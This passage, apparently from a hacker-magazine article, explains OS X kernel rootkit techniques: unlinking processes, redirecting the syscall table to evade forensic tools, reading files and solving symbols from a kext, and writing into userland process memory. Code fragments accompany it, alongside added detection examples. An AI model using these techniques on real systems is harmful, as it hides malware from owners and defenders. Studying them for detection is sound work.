A better solution is to hide your data inside other data files that
can't be easily checksum'ed. Sqlite3 databases come to my mind [35].


----[ 2.5 - Hiding processes

The traditional way to hide processes is to remove them from the process
list maintained by the kernel. When an application requests the process
list, the rootkit intercepts and modifies the request. In this case,
only the results are modified and the underlying structures are still
intact. A rootkit detection tool can access those structures and compare
with the results.

Another possibility is to remove the processes from the process list. This
time a tool that relies on the information in those structures will not be
able to detect the inconsistency because there is none (regarding only
the proc list, because there is data in other structures that can be
used to signal inconsistencies).

Due to OS X design, things are a bit more fun (or complicated) because
the BSD layer runs on top of the XNU layer. The basic process units are
Mach tasks and threads and there's a one-to-one mapping between BSD
processes and Mach tasks. The task is just a container and Mach threads
are the units that execute code. What matters for this case is that there
is an additional list where inconsistencies can be detected - the Mach
tasks list. Using an ASCII version of nofate's diagram found at [3]:

 proc <-> proc  <-> proc  <-> ...
  ^         ^         ^              BSD
--|---------|---------|------------------
  v         v         v              Mach
tasks <-> tasks <-> tasks <-> ...

The version with a hidden process at the BSD layer:

 proc <------------> proc <-> ...
  ^         ^         ^              BSD
--|---------|---------|------------------
  v         v         v              Mach
tasks <-> tasks <-> tasks <-> ...

Each BSD process has a reference to the Mach tasks list via a void pointer
and vice-versa. Traversing both lists can detect the inconsistency
described above and most certainly flag an installed rootkit (it is
possible to have a Mach task without a corresponding BSD process).

struct proc {
(...)
    void *task;     /* corresponding task (static) */
(...)
}

struct task {
(...)
    void *bsd_info; /* the corresponding proc_t */
(...)
}
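
The cross-view comparison described above, as an added example (not code
from the original article): a userland C simulation that walks a simplified
proc list and tasks list and reports procs reachable only through a Mach
task. The list links, the p_pid field, struct xview and the sample pids are
assumptions made for the illustration.

```c
#include <stdio.h>
#include <stddef.h>

/* Simplified stand-ins for the kernel structures: the two cross
 * references shown above plus a list link and a pid (assumptions). */
struct proc {
    struct proc *next;      /* BSD process list link */
    int          p_pid;
    void        *task;      /* corresponding task */
};

struct task {
    struct task *next;      /* Mach tasks list link */
    void        *bsd_info;  /* corresponding proc_t, NULL if none */
};

struct xview {
    int hidden;             /* procs reachable only through a Mach task */
    int dangling;           /* procs whose task is not on the tasks list */
    int mismatched;         /* proc and task do not point at each other */
    int hidden_pid[8];      /* pids of the first few hidden procs */
};

static int proc_listed(const struct proc *head, const struct proc *p)
{
    while (head != NULL && head != p)
        head = head->next;
    return head != NULL;
}

static int task_listed(const struct task *head, const struct task *t)
{
    while (head != NULL && head != t)
        head = head->next;
    return head != NULL;
}

/* Walk both lists and compare the two views of the process table. */
struct xview cross_view_check(const struct proc *procs, const struct task *tasks)
{
    struct xview r = {0};
    const struct task *t;
    const struct proc *p;

    for (t = tasks; t != NULL; t = t->next) {       /* Mach -> BSD */
        p = (const struct proc *)t->bsd_info;
        if (p == NULL)
            continue;   /* a Mach task without a BSD process is legitimate */
        if (!proc_listed(procs, p)) {
            if (r.hidden < 8)
                r.hidden_pid[r.hidden] = p->p_pid;
            r.hidden++;
        } else if (p->task != (const void *)t) {
            r.mismatched++;
        }
    }
    for (p = procs; p != NULL; p = p->next)         /* BSD -> Mach */
        if (!task_listed(tasks, (const struct task *)p->task))
            r.dangling++;
    return r;
}

/* Constructed sample: pids 0, 100 and 200, each with a task, plus one task
 * that has no BSD process. unlink_pid >= 0 emulates the BSD-only unlink. */
struct xview demo_cross_view(int unlink_pid)
{
    static struct proc procs[3];
    static struct task tasks[4];
    static const int pids[3] = { 0, 100, 200 };
    struct proc *head = &procs[0], **pp;
    int i;

    for (i = 0; i < 4; i++) {
        tasks[i].next = (i < 3) ? &tasks[i + 1] : NULL;
        tasks[i].bsd_info = (i < 3) ? (void *)&procs[i] : NULL;
    }
    for (i = 0; i < 3; i++) {
        procs[i].next = (i < 2) ? &procs[i + 1] : NULL;
        procs[i].p_pid = pids[i];
        procs[i].task = &tasks[i];
    }
    for (pp = &head; *pp != NULL; ) {
        if ((*pp)->p_pid == unlink_pid)
            *pp = (*pp)->next;
        else
            pp = &(*pp)->next;
    }
    return cross_view_check(head, tasks);
}

int main(void)
{
    struct xview r = demo_cross_view(100);
    printf("hidden=%d (pid %d) dangling=%d mismatched=%d\n",
           r.hidden, r.hidden_pid[0], r.dangling, r.mismatched);
    return 0;
}
```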

The (not so new) lesson to extract from this is that there are many points
that can be used for detecting inconsistencies in the system. These are
hard to hide if the goal is to hide one or more rogue processes. A much
better solution is to piggyback on normal processes, where detection is
a bit harder - it can be a normal process with an extra thread running
for example. The piggyback solution will be used later to run userland
commands from the kernel.


----[ 2.6 - Modifying the syscall handler

A common technique to hide modifications to the syscall table is to make
a copy and modify the syscall handler to point to this new one. Rootkit
detection utils that just verify the *legit* table are unable to detect
it. There's nothing new about this technique although I have never seen it
in use in OS X. It is a good opportunity to describe how to implement it.

The interrupt 0x80 is handled by the assembly function
idt64_unix_scall [osfmk/x86_64/idt64.s]. The IDT table definition
[osfmk/x86_64/idt_table.h] confirms this and it can be verified at runtime
by querying the IDT and extracting the address of the int80 handler.

USER_TRAP_SPC(0x80,idt64_unix_scall)

Follow the idt64_unix_scall assembler code. The switch to C happens
when unix_syscall[64] function is called, both for interrupt 0x80 and
sysenter/systrap system calls. This code path opens many opportunities
to change pointers, or install trampolines and redirect code to rootkit's
implementation.

One such possibility is to change the table pointer inside
unix_syscall[64]. This is sample code from the 64 bits version:

(...)
    code = regs->rax & SYSCALL_NUMBER_MASK;
    DEBUG_KPRINT_SYSCALL_UNIX(
        "unix_syscall64: code=%d(%s) rip=%llx\n",
        code, syscallnames[code >= NUM_SYSENT ? 63 : code], regs->isf.rip);
    callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code];
    uargp = (void *)(&regs->rdi);
(...)
    AUDIT_SYSCALL_ENTER(code, p, uthread);
    error = (*(callp->sy_call))((void *) p, uargp, &(uthread->uu_rval[0]));
    AUDIT_SYSCALL_EXIT(code, p, uthread, error);
(...)

Disassembly output (here I renamed memory references in IDA since they
have no symbols associated):

loc_FFFFFF80005E169C:
4C 03 2D 2D EA 21 00            add     r13, cs:sysent
4C 3B 2D 26 EA 21 00            cmp     r13, cs:sysent
74 0B                           jz      short loc_FFFFFF80005E16B7

The sysent reference is to:

__DATA:__got:FFFFFF80008000D0 40 58 85 00 80 FF FF FF sysent   dq offset sysent_table

To directly find the location of sysent in the __got section is very
easy. Find out the location of sysent table using one of the section 2
techniques (or some other) and then search the __got section for that
address (to find the location and boundaries of __got section we just
need to read kernel's Mach-O header).

The easiest way to redirect sysent is to modify that pointer to our
modified copy. A (memory) forensic tool that (only) searches for and
looks up the original sysent table will fail to detect this and the next
trick. For example, Volafox v0.8 is vulnerable. Volatility's Mac version
has no sysent plugin available yet at the time of writing.

Another way is to modify the code reference to __got section and instead
point it to somewhere else. This is very easy to implement with diStorm's
assistance.

Disassemble the unix_syscall[64] functions and look for references to
the __got address. The instructions that need to be matched are ADD and
CMP (this assumption appears to always hold true). To calculate the RIP
target address, diStorm has a helper macro called
INSTRUCTION_GET_RIP_TARGET(). If the RIP address matches the __got address
the offset can be updated. Calculate the offset to the address that
contains the pointer to the new table and update it at the instruction
that referenced the old __got pointer.

One last (important!) detail. RIP addressing uses a 32-bit offset,
which appears to be enough to reference the new sysent (dynamically or
statically allocated) in most cases. This might not always be true -
from my experience the distance is very near the signed int limit.

One way to make this safer is to put the pointer in kernel's memory
space. This can be alignment space, Mach-O header (for the lulz!), or
somewhere else (it is just a data pointer so no need for exec permission).
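
A check that covers both redirections described in this section, as an
added example (not code from the original article): it recomputes the
RIP-relative target of the ADD and CMP shown in the disassembly and compares
the __got slot content with the known sysent address. The struct insn
layout, the flag names and the values used in scenarios 1 and 2 are
assumptions; a real tool would take instruction boundaries from a
disassembler and read the slot from kernel memory.

```c
#include <stdint.h>
#include <stdio.h>
#include <stddef.h>

#define SYSENT_PTR_SWAPPED 0x1 /* __got slot no longer holds the known table */
#define SYSENT_REF_MOVED   0x2 /* an ADD/CMP no longer resolves to the slot */
#define SYSENT_REF_MISSING 0x4 /* expected instruction form not found */

/* One instruction as a disassembler reports it: address plus raw bytes. */
struct insn {
    uint64_t addr;
    uint8_t  bytes[7];
};

/* Decode the two forms from the listing: REX.W + ADD (0x03) or CMP (0x3B)
 * r64, [rip+disp32]. Returns 1 and the absolute target on a match. */
static int rip_target(const struct insn *in, uint64_t *target)
{
    const uint8_t *b = in->bytes;
    uint32_t disp;

    if ((b[0] & 0xF8) != 0x48)              /* REX prefix with W set */
        return 0;
    if (b[1] != 0x03 && b[1] != 0x3B)       /* ADD / CMP r64, r/m64 */
        return 0;
    if ((b[2] & 0xC7) != 0x05)              /* ModRM: mod=00, rm=101 (RIP) */
        return 0;
    disp = (uint32_t)b[3] | (uint32_t)b[4] << 8 |
           (uint32_t)b[5] << 16 | (uint32_t)b[6] << 24;
    /* RIP points past the 7-byte instruction; disp32 is sign-extended. */
    *target = in->addr + 7 + (uint64_t)(int64_t)(int32_t)disp;
    return 1;
}

/* refs[] holds the instructions at the addresses where a clean kernel of
 * the same build references sysent through __got. */
int audit_sysent_refs(const struct insn *refs, size_t n, uint64_t got_slot,
                      uint64_t slot_value, uint64_t known_sysent)
{
    uint64_t target;
    int flags = 0;
    size_t i;

    for (i = 0; i < n; i++) {
        if (!rip_target(&refs[i], &target))
            flags |= SYSENT_REF_MISSING;
        else if (target != got_slot)
            flags |= SYSENT_REF_MOVED;
    }
    if (slot_value != known_sysent)
        flags |= SYSENT_PTR_SWAPPED;
    return flags;
}

/* Bytes and addresses are the ones in the disassembly above; the CMP
 * address is the ADD address plus 7. Scenarios 1 and 2 are constructed. */
int demo_audit(int scenario)
{
    struct insn refs[2] = {
        { 0xFFFFFF80005E169CULL, { 0x4C, 0x03, 0x2D, 0x2D, 0xEA, 0x21, 0x00 } },
        { 0xFFFFFF80005E16A3ULL, { 0x4C, 0x3B, 0x2D, 0x26, 0xEA, 0x21, 0x00 } },
    };
    uint64_t got_slot = 0xFFFFFF80008000D0ULL;      /* __DATA:__got entry */
    uint64_t known_sysent = 0xFFFFFF8000855840ULL;  /* 40 58 85 00 80 FF FF FF */
    uint64_t slot_value = known_sysent;

    if (scenario == 1)          /* slot content replaced (constructed value) */
        slot_value = 0xFFFFFF7F80A01000ULL;
    if (scenario == 2) {        /* both displacements changed (constructed) */
        refs[0].bytes[4] = 0xFA;
        refs[1].bytes[4] = 0xFA;
    }
    return audit_sysent_refs(refs, 2, got_slot, slot_value, known_sysent);
}

int main(void)
{
    int s;

    for (s = 0; s < 3; s++)
        printf("scenario %d -> flags 0x%x\n", s, demo_audit(s));
    return 0;
}
```

When SYSENT_REF_MOVED is set, the slot the instruction now resolves to is
the next thing to read and compare.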


--[ 3 - Reading the filesystem from kernel land

Now let's get going with the fun stuff that opens the door to even
funnier stuff!

One of the annoying obstacles that Apple introduced against development
of rootkits is the lack of kernel's full __LINKEDIT segment up to Snow
Leopard. Useful symbols for rootkit development are also not exported. No
one said rootkit development was easy - fun but not always easy.

Possible solutions are to solve the symbols from userland, and pattern
search from the kext - this one easily susceptible to failure due to
changing patterns in kernel versions and compilers.

For example, OS.X/Crisis spyware adopts a mixed approach. Most symbols
are solved from the userland agent and communicated thru a character
device to the rootkit, but sLoadedKexts is solved with byte search -
starting point is still a symbol solved from userland.

The easiest solution to this problem is to read the kernel file
(/mach_kernel) from the rootkit and process the symbol table, as it is
done from userland. The extracted addresses need to be fixed with the
kernel ASLR slide but that is easily bypassed as described in section 2.2.

As far as I know no publicly known OS X rootkit ever implemented arbitrary
filesystem read, and probably very few to none in other platforms (TDSS
being the most famous in Windows). There is some kind of myth about the
difficulty of implementing this or something else that made rootkit
developers avoid it. I must confess I was influenced by that "myth"
and never bothered to give it a try before this article.

In practice the implementation is extremely easy! Sometimes you just
need to be in the right mood and give it a try.

Two methods will be shown, one very easy based on exported symbols (and
a copy of a very stable private extern kernel function), and another a
bit more complex that requires some unexported symbols. Both are based on
VFS - the obvious and easiest way to achieve our goal. Other functions
can be used so many variations are possible. That is left open for you
to explore, I still have a lot to write about in this paper :-)


----[ 3.1 - Real short overview of VFS

The Virtual-Filesystem Interface was introduced in 4.4BSD and first
implemented by Sun Microsystems. Before this innovation file entries
directly referenced filesystem inodes. This method does not scale well
if there is more than one filesystem type.

VFS is an additional extensible object-oriented layer that introduces
an abstraction of the underlying filesystem, making it easy to support
multiple filesystems. Instead of inodes there are vnodes. There is no
need to deal with the intricacies of multiple filesystems - we can use
the VFS related functions and let the kernel do the filesystem operations
"dirtywork".

The most interesting VFS related structures to our purposes are:
- struct filedesc: defined at bsd/sys/filedesc.h, represents the open files
in a process.
- struct fileproc: defined at bsd/sys/file_internal.h, represents each open
file.
- struct fileglob: defined at bsd/sys/file_internal.h, contains all the
information associated to a file, including vnode and supported filesystem
operations.
- struct vnode: defined at bsd/sys/vnode_internal.h.

Detailed references about the design and implementation can be found at
[20], [14] and [13].


----[ 3.2 - The easy way - Apple loves rootkit authors!

The first piece of information that we need is the vnode of the target
file we want to read. We have already seen in section 2.4 that this
information is available in the proc_t structure but we can follow an
easier path!

One suitable function is vnode_lookup() (available in BSD KPI). It is
defined at bsd/vfs/vfs_subr.c in XNU source code, and well documented
at bsd/sys/vnode.h include:

/*!
 @function vnode_lookup
 @abstract Convert a path into a vnode.
 @discussion This routine is a thin wrapper around xnu-internal lookup
routines; if successful, it returns with an iocount held on the resulting
vnode which must be dropped with vnode_put().
 @param path Path to look up.
 @param flags VNODE_LOOKUP_NOFOLLOW: do not follow symbolic links.
              VNODE_LOOKUP_NOCROSSMOUNT: do not cross mount points.
 @return Results 0 for success or an error code.
 */
errno_t vnode_lookup(const char *, int, vnode_t *, vfs_context_t);

The arguments are the path for the target file, search flags, a vnode_t
pointer for output and the vfs context for the current thread (or kernel
context).

The vfs context can be obtained using the function vfs_context_current()
but it is only available in the Unsupported KPI - subject to whatever
Apple wants to do with it so not stable enough for our purposes. In
practice the vfs context is not a problem because Apple (or BSD's
original code) took good care of us. Let me show you why with kernel's
implementation of vnode_lookup():

errno_t
vnode_lookup(const char *path, int flags, vnode_t *vpp, vfs_context_t ctx)
{
    struct nameidata nd;
    int error;
    u_int32_t ndflags = 0;

    if (ctx == NULL) {      /* XXX technically an error */
        ctx = vfs_context_current(); // <- thank you! :-)
    }
(...)
}

Apple's love means that we just need a simple operation to retrieve
kernel's vnode:

#include <sys/vnode.h>
int error = 0;
vnode_t kernel_vnode = NULLVP;
error = vnode_lookup("/mach_kernel", 0, &kernel_vnode, NULL);

One important detail is that vnode_lookup() will increase the iocount on
the target vnode (in case you missed the note above from vnode_lookup). We
must release it using vnode_put() when we do not need it anymore (after
reading or writing what we want). This function is also available in
the BSD KPI.

Having kernel's vnode information we can finally read its contents from
the rootkit. To do that we can use the VNOP_READ() function - documented
and declared at bsd/sys/vnode_if.h.

/*!
 @function VNOP_READ
 @abstract Call down to a filesystem to read file data.
 @discussion VNOP_READ() is where the hard work of of the read() system
call happens. The filesystem may use  the buffer cache, the cluster layer,
or an alternative method to get its data; uio routines will be used to see
that data is copied to the correct virtual address in the correct address
space and will update its uio argument to indicate how much data has been
moved.
 @param vp The vnode to read from.
 @param uio Description of request, including file offset, amount of data
requested, destination address for data, and whether that destination is in
kernel or user space.
 @param ctx Context against which to authenticate read request.
 @return 0 for success or a filesystem-specific error. VNOP_READ() can
return success even if less data was read than originally requested;
returning an error value should indicate that something actually went
wrong.
 */
extern errno_t VNOP_READ(vnode_t, struct uio *, int, vfs_context_t);

The last missing piece is a uio structure. To create that buffer we
can use three other functions: uio_create(), uio_createwithbuffer()
and uio_addiov().

Two are available in BSD KPIs - uio_create and uio_addiov. The other
one, uio_createwithbuffer is private extern and used by uio_create. We
can rip its implementation into our rootkit code from XNU source file
bsd/kern/kern_subr.c. It's simple and stable enough to make this possible
(never modified in all latest OS X versions).

Once again we can pass NULL to the ctx argument - the implementation takes
care of it for us as in vnode_lookup().

An example of how to create the required structure to hold a 4 KB page:

char data_buffer[PAGE_SIZE_64];
uio_t uio = NULL;
uio = uio_create(1, 0, UIO_SYSSPACE, UIO_READ);
error = uio_addiov(uio, CAST_USER_ADDR_T(data_buffer), PAGE_SIZE_64);

The same example using uio_createwithbuffer:

char data_buffer[PAGE_SIZE_64];
uio_t uio = NULL;
char uio_buf[UIO_SIZEOF(1)];
uio = uio_createwithbuffer(1, 0, UIO_SYSSPACE, UIO_READ, &uio_buf[0],
 sizeof(uio_buf));
error = uio_addiov(uio, CAST_USER_ADDR_T(data_buffer), PAGE_SIZE_64);

First create the uio structure, then add the data buffer to it with
uio_addiov(), otherwise it can't be used. The data buffer can be a
statically allocated buffer (as above) or dynamically allocated using
_MALLOC() or other available kernel variant.

Having the uio buffer created the last step is to execute the read:

error = VNOP_READ(kernel_vnode, uio, 0, NULL);

If successful, data_buffer will contain the first page (4096 bytes) of
the OS X kernel file /mach_kernel.

A good implementation reference of this process is the kernel function
dqfileopen() [bsd/vfs/vfs_quota.c].


----[ 3.3 - The more complex way

This second approach was in fact how I started to explore this problem,
before I learnt about vnode_lookup(). It is a good backup method
but the learning experience and some techniques used to obtain some
information are the interesting bits here.

Its biggest inconvenience is that it requires the unexported symbol
VNOP_LOOKUP(). This function requires different arguments but has the
same functionality as vnode_lookup() - to look up the vnode of a file
or directory. Documentation can be found at bsd/sys/vnode_if.h.

/*!
 @function VNOP_LOOKUP
 @abstract Call down to a filesystem to look for a directory entry by name.
 @discussion VNOP_LOOKUP is the key pathway through which VFS asks a
filesystem to find a file. The vnode should be returned with an iocount to
be dropped by the caller. A VNOP_LOOKUP() calldown can come without a
preceding VNOP_OPEN().
 @param dvp Directory in which to look up file.
 @param vpp Destination for found vnode.
 @param cnp Structure describing filename to find, reason for lookup, and
various other data.
 @param ctx Context against which to authenticate lookup request.
 @return 0 for success or a filesystem-specific error.
 */
#ifdef XNU_KERNEL_PRIVATE
extern errno_t VNOP_LOOKUP(vnode_t, vnode_t *, struct componentname *,
vfs_context_t);
#endif /* XNU_KERNEL_PRIVATE */

The first argument is the vnode of the directory where the target file
is located. It is a kind of a chicken and egg problem because we do not
have that information - we want it! Do not fear, this information can
be extracted from somewhere else. As previously described, the proc
structure contains the field p_fd - pointer to open files structure
(struct filedesc).

The filedesc structure has two interesting fields for our purposes:

1) fd_ofiles - an array of file structures for open files.
2) fd_cdir   - vnode structure of current directory.

There is also fd_rdir, which is the vnode of root directory but from my
tests it is usually NULL.

The proc structure is a doubly-linked list - we can "walk" around it and
retrieve information of any process. In OS X, the kernel is just another
Mach task with PID 0 and a corresponding proc entry - before Leopard
we could access kernel task via task_for_pid(0), which allowed DKOM
(direct kernel object manipulation). The mach_kernel file is located at
the root directory /.

The proposed procedure is to traverse the proc structure and find pid 0
(field p_pid). When found, the field fd_cdir will contain what we need -
the vnode for the root directory.

Next problem: how to access the proc structure. There is a symbol called
allproc that contains a pointer to it but it is not exported anymore. We
need an alternative way! Two solutions: complicated and straightforward.

Recall what was already described in section 2.4: the kernel's
implementation of syscall functions has a struct proc * as first
parameter. Using open() as example:

open(struct proc *p, struct open_args *uap, int *retval)

What we can do is to temporarily (or not) hijack a syscall via sysent
table and get a reference to any proc_t. Since it is a doubly-linked
list we can traverse it and find PID 0. When found we can extract the
vnode pointer for current directory and that is it.

The kernel does not keep /mach_kernel open so the field fd_ofiles is
not useful. Luckily for us the fd_cdir is populated with the information
we need - vnode of root directory /.

The kernel-knowledgeable reader knows there is no need for all this
mess to retrieve a proc_t structure. There is a BSD KPI function that
solves the problem with a single call, proc_find(). Its prototype is:

proc_t proc_find(int pid)

Kernel is just another task with PID 0, so just execute proc_find(0)
and get the required structure pointer. This will increase the reference
count and must be released using proc_rele(). Very easy, right? :-)

Once again we need a vfs context and this time we need to supply it. While
researching I used a hardcoded function pointer to vfs_context_current()
but there is a better function that I found out while writing this
section. It is vfs_context_create(), available in BSD KPI.

/*!
 @function vfs_context_create
 @abstract Create a new vfs_context_t with appropriate references held.
 @discussion The context must be released with vfs_context_rele() when no
longer in use.
 @param ctx Context to copy, or NULL to use information from running
thread.
 @return The new context, or NULL in the event of failure.
 */
vfs_context_t vfs_context_create(vfs_context_t);

We can use this function to create a new context and pass it to
VNOP_LOOKUP(). The next step is to create a struct componentname
[bsd/sys/vnode.h].

struct componentname {
     // Arguments to lookup.
    uint32_t    cn_nameiop;     /* lookup operation */
    uint32_t    cn_flags;       /* flags (see below) */
    void        *cn_reserved1;  /* use vfs_context_t */
    void        *cn_reserved2;  /* use vfs_context_t */
    // Shared between lookup and commit routines.
    char        *cn_pnbuf;      /* pathname buffer */
    int         cn_pnlen;       /* length of allocated buffer */
    char        *cn_nameptr;    /* pointer to looked up name */
    int         cn_namelen;     /* length of looked up component */
    uint32_t    cn_hash;        /* hash value of looked up name */
    uint32_t    cn_consume;     /* chars to consume in lookup() */
};

A small example to lookup /mach_kernel:

 struct componentname cnp;
 char tmpname[] = "mach_kernel";
 bzero(&cnp, sizeof(cnp));

 cnp.cn_nameiop = LOOKUP;
 cnp.cn_flags = ISLASTCN;
 cnp.cn_reserved1 = vfs_context_create(NULL);
 cnp.cn_pnbuf = tmpname;
 cnp.cn_pnlen = sizeof(tmpname);
 cnp.cn_nameptr = cnp.cn_pnbuf;
 cnp.cn_namelen = (int)strlen(tmpname); // <- add NULL ?

Now we are ready to call VNOP_LOOKUP() and use the returned vnode
information to execute VNOP_READ() as in section 3.1 (do not forget to
create the UIO buffer first).

Last but not least, there is another function we can (ab)use to read files
- vn_rdwr(). It was this function that triggered my curiosity about this
process while reading about the execution flow of a Mach-O binary. The
parameters it requires can be retrieved or created with the techniques
described above or others you might come up with. Feel free to implement
it and discover alternative ways to read the files (there are more!).

Writing is not harder than reading. Just browse the source files mentioned
in this section and the functions you need will be obvious. You can
apply the techniques described here to fill the required parameters.


----[ 3.4 - Solving kernel symbols

Snare on his blog post [5] explains in detail how to solve the kernel
symbols. The only difference is that instead of reading directly from
kernel memory we have the information in temporary buffers with data
read from the filesystem.

The proposed workflow is:

1) Read the first page of /mach_kernel, which contains the Mach-O header.
2) Process the Mach-O header and retrieve the following information:
   - From __TEXT segment: vmaddr field (for ASLR slide computation).
   - From __LINKEDIT segment: fileoff and filesize (so we can read the
   segment).
   - From LC_SYMTAB command: symoff, nsyms, stroff, strsize.
   Refer to [10] for more information about Mach-O file format.
3) Allocate buffer and read the whole __LINKEDIT segment.
4) Solve any required symbol by processing the __LINKEDIT buffer using the
LC_SYMTAB collected information (offsets to symbol and string tables).
5) Do not forget to add the kernel ASLR slide to the addresses. Slide can
be computed by the difference between running __TEXT vmaddr and the one
read from disk.

There is no need to read the whole mach_kernel file into kernel space,
we just need the headers and __LINKEDIT segment, around 1MB, smaller
than the 7.8MB of Mountain Lion 10.8.2 full kernel. Kernel memory is at
a premium :-)
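
Steps 4 and 5 of the workflow, as an added userland example (not the
author's code): a lookup over a buffer that holds only the __LINKEDIT
segment, rebasing the LC_SYMTAB file offsets onto that buffer and applying
the slide from step 5. struct kinfo, the function names, and the sample
symbol names and addresses are constructed for the illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Symbol table entry, same field order as struct nlist_64 in
 * <mach-o/nlist.h>. */
struct nlist64 {
    uint32_t n_strx;    /* offset of the name in the string table */
    uint8_t  n_type;
    uint8_t  n_sect;
    uint16_t n_desc;
    uint64_t n_value;   /* address as linked, without the ASLR slide */
};

/* What step 2 collects from the Mach-O header. */
struct kinfo {
    uint64_t text_vmaddr;                    /* __TEXT vmaddr on disk */
    uint64_t linkedit_off, linkedit_size;    /* __LINKEDIT fileoff, filesize */
    uint32_t symoff, nsyms, stroff, strsize; /* LC_SYMTAB */
};

/* Steps 4-5: find a name in the __LINKEDIT buffer and return its address
 * with the slide applied (0 if absent or if the tables are out of range). */
uint64_t solve_symbol(const uint8_t *le, const struct kinfo *ki,
                      const char *name, uint64_t running_text_vmaddr)
{
    uint64_t slide = running_text_vmaddr - ki->text_vmaddr;   /* step 5 */
    uint64_t sym, str;
    size_t nlen = strlen(name);
    struct nlist64 nl;
    uint32_t i;

    /* symoff and stroff are file offsets; rebase them onto the buffer. */
    if (ki->symoff < ki->linkedit_off || ki->stroff < ki->linkedit_off)
        return 0;
    sym = ki->symoff - ki->linkedit_off;
    str = ki->stroff - ki->linkedit_off;
    if (sym + (uint64_t)ki->nsyms * sizeof(nl) > ki->linkedit_size ||
        str + ki->strsize > ki->linkedit_size)
        return 0;

    for (i = 0; i < ki->nsyms; i++) {
        memcpy(&nl, le + sym + (size_t)i * sizeof(nl), sizeof(nl));
        if (nl.n_strx >= ki->strsize || ki->strsize - nl.n_strx <= nlen)
            continue;                   /* name would overrun the strings */
        if (memcmp(le + str + nl.n_strx, name, nlen + 1) == 0)
            return nl.n_value + slide;
    }
    return 0;
}

/* Constructed sample (not a real kernel): a 0x40-byte __LINKEDIT at file
 * offset 0x1000 holding two symbols followed by their string table. */
uint64_t demo_solve(const char *name, uint64_t running_text_vmaddr)
{
    static uint8_t le[0x40];
    static const char names[0x20] = "\0_proc_find\0_vn_getpath";
    struct nlist64 sy[2] = { {  1, 0x0f, 1, 0, 0xFFFFFF8000201000ULL },
                             { 12, 0x0f, 1, 0, 0xFFFFFF8000202000ULL } };
    struct kinfo ki = { 0xFFFFFF8000200000ULL, 0x1000, 0x40,
                        0x1000, 2, 0x1020, 0x20 };

    memcpy(le, sy, sizeof(sy));
    memcpy(le + 0x20, names, sizeof(names));
    return solve_symbol(le, &ki, name, running_text_vmaddr);
}

int main(void)
{
    /* Running __TEXT vmaddr constructed to give a slide of 0x4800000. */
    printf("_proc_find at 0x%llx\n",
           (unsigned long long)demo_solve("_proc_find", 0xFFFFFF8004A00000ULL));
    return 0;
}
```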


--[ 4 - Executing userland binaries from the kernel

This section describes a technique to execute userland processes
from a kernel extension (not tested but should also be valid from
IOKit drivers). For this purpose wowie and ghalen used the KUNC API
(Kernel-User Notification Center), a straightforward interface to execute
userland executables. One problem with KUNC is that the required symbols
are provided by the Unsupported KPI and Apple has the following note:
"The Kernel-User Notification Center APIs are not available to KEXTs that
declare dependencies on the sustainable kernel programming interfaces
(KPIs) introduced in OS X v10.4."

Having different ways to accomplish a given goal is more fun and
improves knowledge, which is this paper's main goal. The technique to be
presented is probably not the most efficient one but it is a good learning
experience about playing with kernel and how everything is implemented.


----[ 4.1 - Writing from kernel memory into userland processes

The first step is to find a way to write to userland process addresses
from a kernel extension. In userland there is the mach_vm_write() function
(or older vm_write()) to write to any arbitrary process, assuming we
have the right permissions to do so (task_for_pid() is our friend).

Its prototype is:

kern_return_t mach_vm_write(vm_map_t target_task,
mach_vm_address_t address, vm_offset_t data,
mach_msg_type_number_t dataCnt);

If you look at the definition of the task structure (a void* at proc
structure but defined at osfmk/kern/task.h) you can find the first
parameter to mach_vm_write in the "map" field. The remaining parameters
are the target address, the data buffer to write and its size.

Do not forget that we first need to use mach_vm_protect (or vm_protect)
to change memory protections if trying to write to the read-only
segments/sections.

The problem with this approach is that it does not work!
The memory protection is changed but mach_vm_write() does not modify the
target address. The answer is that if called like this we are trying
to write data from kernel space directly to the userland space, which
should (obviously!) fail. Remember we need to use copyin/copyout to
copy between the two spaces.

We need another solution and I will present not one but two, both easy
to use. Thanks go to snare for giving me some initial sample code from
his own research.

The first solution uses three functions, vm_map_copyin(),
vm_map_copyout(), and mach_vm_copy(). You can read their description at
osfmk/vm/vm_map.c and vm_user.c in XNU sources.

vm_map_copyin creates an object from a given address located in a given
map that we can insert into another address space. This assures the
correct transition between kernel and user virtual memory spaces.

The vm_map_copyout() function copies the object into the target map,
aka, our target process. We need the vm_map_t info for kernel and target
process - both can be found by iterating proc list or proc_find(),
as previously described.

There is one important detail about vm_map_copyout! It injects the object
"into newly-allocated space in the destination map". What this means is
that we are just copying the data into a new memory address at the user
process and not at the target address we want. Let me show you with an
example of what happens using that command:

char *fname = "nemo_and_snare_rule!";
kern_return_t kr = 0;
vm_map_address_t dst_addr;

kr = vm_map_copyin(kernel_task->map, (vm_map_address_t)fname,
strlen(fname)+1, FALSE, &copy);
kr = vm_map_copyout(task->map, &dst_addr, copy);

dst_addr will contain the value 0x11fa000 (target was a 32 bits process).
Dumping the process memory:

sh-3.2# ./readmem -p 121 -a 0x11fa000 -s 32
[ Readmem v0.4 - (c) fG! ]
--------------------------
Memory protection: rw-/rwx

0x11fa000 6e 65 6d 6f 5f 61 6e 64 5f 73 6e 61 72 65 5f 72 nemo_and_snare_r
0x11fa010 75 6c 65 21 00 00 00 00 00 00 00 00 00 00 00 00 ule!............

At this point we need to copy the contents to the target address we
want. This can be achieved using mach_vm_copy() - a function that
copies one memory region to another within the same task. The address
where the data was copied to can be found at the second parameter of
vm_map_copyout().

It must be noted that the first two functions are available as
Private KPIs and mach_vm_copy() is not exported (I cheated in the example
above). Not a big problem since we can easily solve the symbols.

The sample code to write to the Mach-O header of a 32 bits, no ASLR
binary could be something like this:

// get proc_t structure and task pointers
struct proc *p = proc_find(PID);
struct proc *p_kernel = proc_find(0);
struct task *task = (struct task*)(p->task);
struct task *kernel_task = (struct task*)(p_kernel->task);
kern_return_t kr = 0;
vm_prot_t new_prot = VM_PROT_WRITE | VM_PROT_READ;
kr = mach_vm_protect((vm_map_t)task->map, 0x1000, len, FALSE, new_prot);

vm_map_copy_t copy;
char *fname = "nemo_and_snare_rule!";
vm_map_address_t dst_addr;

// create a vm_map_copy_t object so we can insert it at userland process
kr = vm_map_copyin(kernel_task->map, (vm_map_address_t)fname,
strlen(fname)+1, FALSE, &copy);

// copy the object to userland, this will allocate a new space into target
// map
kr = vm_map_copyout((vm_map_t)task->map, &dst_addr, copy);
printf("wrote to userland address 0x%llx\n", CAST_USER_ADDR_T(dst_addr));

// and now we can use mach_vm_copy() because it copies data within the same
// task
